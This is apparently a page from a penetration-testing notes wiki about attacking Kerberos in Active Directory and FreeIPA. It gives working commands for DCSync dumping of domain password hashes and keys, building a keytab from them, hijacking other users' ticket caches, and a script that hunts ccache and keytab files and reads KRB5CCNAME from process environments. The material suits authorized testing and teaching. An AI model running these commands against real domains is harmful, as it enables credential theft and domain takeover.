> For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos.md).

# Kerberos

* <https://www.roguelynn.com/words/explain-like-im-5-kerberos/>
* <https://vbscrub.com/2020/05/13/kerberos-protocol-explained/>
* <https://www.tarlogic.com/en/blog/how-kerberos-works/>
* <https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>
* <https://www.tarlogic.com/en/blog/kerberos-iii-how-does-delegation-work/>
* <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>
* <https://habr.com/ru/company/tomhunter/blog/507140/>
* <https://habr.com/ru/company/tomhunter/blog/509290/>
* <https://ardent101.github.io/posts/kerberos_theory/>
* <https://ardent101.github.io/posts/kerberos_general_attacks/>
* <https://habr.com/ru/articles/803163/>

{% embed url="https://blog.zsec.uk/common-tool-errors-kerberos/" %}

{% embed url="https://youtu.be/qZPvgoUzCdI" %}

## Synchronize Time

Using `ntpdate`:

```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```

Using `faketime` (fakes the clock only for the wrapped process, so no root is needed and the host clock stays untouched; the second command assumes ntpsec's `ntpdate` wrapper, whose `-q` output starts with `YYYY-MM-DD HH:MM:SS.ffffff`, while the classic ntp `ntpdate -q` prints `server ...` first and needs the LDAP method instead):

```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```

Using LDAP (the rootDSE `currentTime` attribute is readable anonymously and is always UTC, so `X` is an extra offset in hours to apply and is normally `0`; the value must be quoted when passed to `date -s`, otherwise the date and time are split into two arguments):

```
$ LDAP_TIME=`ldapsearch -x -H ldap://DC01.megacorp.local -s base -b "" currentTime | awk '/^currentTime:/ {print $2}' | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/'`
$ LDAP_TIME=`date -u -d "$LDAP_TIME X hours" '+%Y-%m-%d %H:%M:%S'`
$ echo "$LDAP_TIME" && sudo date -u -s "$LDAP_TIME"
```
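The same procedure as a script, added here as an example rather than taken from the original page: it parses the rootDSE `currentTime` value, computes the skew against the local clock, and only when the skew exceeds the 5-minute default Kerberos tolerance (the cause of `KRB_AP_ERR_SKEW` / "Clock skew too great") prints the `faketime` string to wrap tools with. The `ldapsearch` output is a constructed sample embedded inline so the script runs offline; replace it with a live query against your DC.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): clock-skew check from rootDSE currentTime.

# Convert an LDAP generalizedTime value such as 20240510123456.0Z to a Unix epoch.
ldap_time_to_epoch() {
    local gt iso
    gt="$1"
    # YYYYMMDDHHMMSS[.fraction]Z -> "YYYY-MM-DD HH:MM:SS UTC"
    iso=$(printf '%s' "$gt" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2}).*$/\1-\2-\3 \4:\5:\6 UTC/')
    date -u -d "$iso" '+%s'
}

# Read the DC epoch from ldapsearch rootDSE output on stdin. Anchoring on
# "^currentTime:" skips the "# requesting: currentTime" comment line.
dc_epoch_from_ldif() {
    local gt
    gt=$(awk '/^currentTime:/ {print $2; exit}')
    [ -n "$gt" ] || return 1
    ldap_time_to_epoch "$gt"
}

# Signed skew in seconds: positive means the DC is ahead of this host.
skew_seconds() {
    echo $(( $1 - $2 ))
}

# Succeeds when |skew| is within the default 5-minute KDC tolerance (clockskew).
clock_skew_ok() {
    local s
    s=$(skew_seconds "$1" "$2")
    [ "${s#-}" -le 300 ]
}

# Epoch -> the "YYYY-MM-DD HH:MM:SS" form faketime expects. faketime reads the
# string in the local timezone, so the conversion deliberately uses local time.
faketime_string() {
    date -d "@$1" '+%Y-%m-%d %H:%M:%S'
}

# Constructed sample of `ldapsearch -x -H ldap://DC01 -s base -b "" currentTime` output.
SAMPLE_ROOTDSE='# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: currentTime
#

#
dn:
currentTime: 20240510123456.0Z

# search result
search: 2
result: 0 Success'

demo() {
    local dc_epoch local_epoch
    dc_epoch=$(printf '%s\n' "$SAMPLE_ROOTDSE" | dc_epoch_from_ldif)
    local_epoch=$(date -u '+%s')
    if clock_skew_ok "$dc_epoch" "$local_epoch"; then
        echo "skew $(skew_seconds "$dc_epoch" "$local_epoch")s, within Kerberos tolerance"
    else
        echo "skew $(skew_seconds "$dc_epoch" "$local_epoch")s, run tools under:"
        echo "  faketime '$(faketime_string "$dc_epoch")' <tool>"
    fi
}

demo
```

For a live check, replace the sample with `ldapsearch -x -H ldap://$DC -s base -b "" currentTime | dc_epoch_from_ldif`; the skew sign tells you which way the clocks differ, which matters when you later correlate KDC events with your own logs.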

## Describe Tickets

* <https://github.com/YossiSassi/Get-KerberosServiceTicketAudit>

Using [describeTicket.py](https://github.com/fortra/impacket/blob/master/examples/describeTicket.py):

```
$ describeTicket.py --rc4 21c1d44272e8ad1ee9e6b1aed2943688 --aes d38bf2b75fd1732a4cd7e5d129c62f0ed7feaccaff05c6b4a3bf6a9fc2004036 /tmp/snovvcrash.ccache
```

## Decrypt KRB5 Traffic

* <https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/>
* <https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7>

{% code title="keytab.sh" %}

```bash
REALM='MEGACORP.LOCAL'
# DCSync the whole domain; the dump holds both NT hashes (etype 23) and AES256 keys (etype 18)
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out

# ---

# NTLM lines are "domain\user:rid:lmhash:nthash:::" (aad3b435... is the empty LM hash), so field 4 is the NT hash
cat secretsdump.out | grep aad3b435 | awk -F: '{print "    (23, '\''"$4"'\''),"}' > keys
# AES lines are "domain\user:aes256-cts-hmac-sha1-96:key", so field 3 is the key
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print "    (18, '\''"$3"'\''),"}' >> keys
# pinned revision: the generated tuples are spliced into its key list between lines 112 and 118
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
# writes keytab.kt; load it in Wireshark under Edit > Preferences > Protocols > KRB5 and enable "Try to decrypt Kerberos blobs"
python3 keytab.py keytab.kt
```

{% endcode %}

## Kerberos on Linux

* <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory>

Check `KRB5CCNAME` environment variable contents:

```
$ env | grep KRB5
```

Request a TGT by supplying the password (without an argument `kinit` uses the current Unix username as the principal, so pass `user@REALM` explicitly when they differ):

```
$ kinit
$ klist
```

List available SPNs (`-Y GSSAPI` authenticates with the TGT already in the cache, so no bind DN or `-W` password prompt is needed):

```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -b "dc=megacorp,dc=local" "(servicePrincipalName=*)" servicePrincipalName
```

Request TGS for MSSQL service:

```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```

Re-using keytab files to obtain a TGT and renew it (`kinit -R` only works while the ticket is still within its renewable lifetime):

```
$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```

Re-using ccache files found on the host. The cache is selected through `KRB5CCNAME` (the `FILE:` prefix is the default type, so a bare path also works); copying the cache instead of `chown`-ing it leaves the original owner's session intact:

```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCNAME=FILE:/tmp/krb5cc_31337
$ klist
```
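Hunting for credential material beyond `env | grep KRB5`, as an added example that is not part of the original page: the script below identifies ccache and keytab files by their MIT krb5 magic bytes instead of by file name, prints the command that loads each hit, and shows how to pull `KRB5CCNAME` values out of the environment of running processes. The directories to scan and the three files written under `mktemp` are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): find Kerberos ccaches and keytabs by file magic.

# MIT krb5 files start with byte 0x05 followed by a format version byte:
#   05 04 / 05 03 -> FILE credential cache (v4 is what current MIT and Heimdal write)
#   05 02         -> keytab v2 (v1 ccaches and keytabs shared 05 01 and are obsolete)
krb5_file_type() {
    local magic
    magic=$(od -An -tx1 -N2 -- "$1" 2>/dev/null | tr -d ' \n')
    case "$magic" in
        0504|0503) echo ccache ;;
        0502)      echo keytab ;;
        *)         return 1 ;;
    esac
}

# Walk the given directories and print "KIND<TAB>PATH<TAB>LOAD-COMMAND" for every hit.
find_krb5_creds() {
    local f kind
    find "$@" -type f -size +1c 2>/dev/null | while IFS= read -r f; do
        kind=$(krb5_file_type "$f") || continue
        case "$kind" in
            ccache) printf '%s\t%s\texport KRB5CCNAME=FILE:%s\n' "$kind" "$f" "$f" ;;
            keytab) printf '%s\t%s\tkinit -k -t %s <principal>\n' "$kind" "$f" "$f" ;;
        esac
    done
}

# Caches outside /tmp (e.g. KEYRING: or DIR: types) show up in the environment of the
# processes using them; /proc/<pid>/environ is readable only for your own processes
# unless you are root.
find_krb5ccname_in_procs() {
    local p line
    for p in /proc/[0-9]*; do
        tr '\0' '\n' < "$p/environ" 2>/dev/null | grep '^KRB5CCNAME=' | while IFS= read -r line; do
            printf '%s\t%s\n' "${p#/proc/}" "$line"
        done
    done
}

demo() {
    local d
    d=$(mktemp -d)
    # constructed: a v4 ccache, a v2 keytab and a plain-text decoy
    printf '\005\004\000\000' > "$d/krb5cc_1000"
    printf '\005\002\000\000' > "$d/host.keytab"
    printf 'nothing here\n' > "$d/notes.txt"
    find_krb5_creds "$d"
    rm -rf "$d"
}

demo
```

On a real host run `find_krb5_creds /tmp /var/lib/sss /etc /home` (and `/etc/krb5.keytab` on domain-joined machines is the usual keytab hit), then `find_krb5ccname_in_procs` for caches that are not plain files; a `0502` match can in theory be an obsolete v2 ccache, so confirm with `klist -k -t <file>` before relying on it.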

### FreeIPA

* <https://tishina.in/ops/freeipa-postexploitation>
* <https://habr.com/ru/companies/rvision/articles/825086/>

A blog series by [@n0pe\_sled](https://medium.com/@n0pe_sled) on attacking FreeIPA:

* [Building a FreeIPA Lab](https://posts.specterops.io/building-a-freeipa-lab-17f3f52cd8d9)
* [Attacking FreeIPA — Part I Authentication](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
* [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
* <https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting>
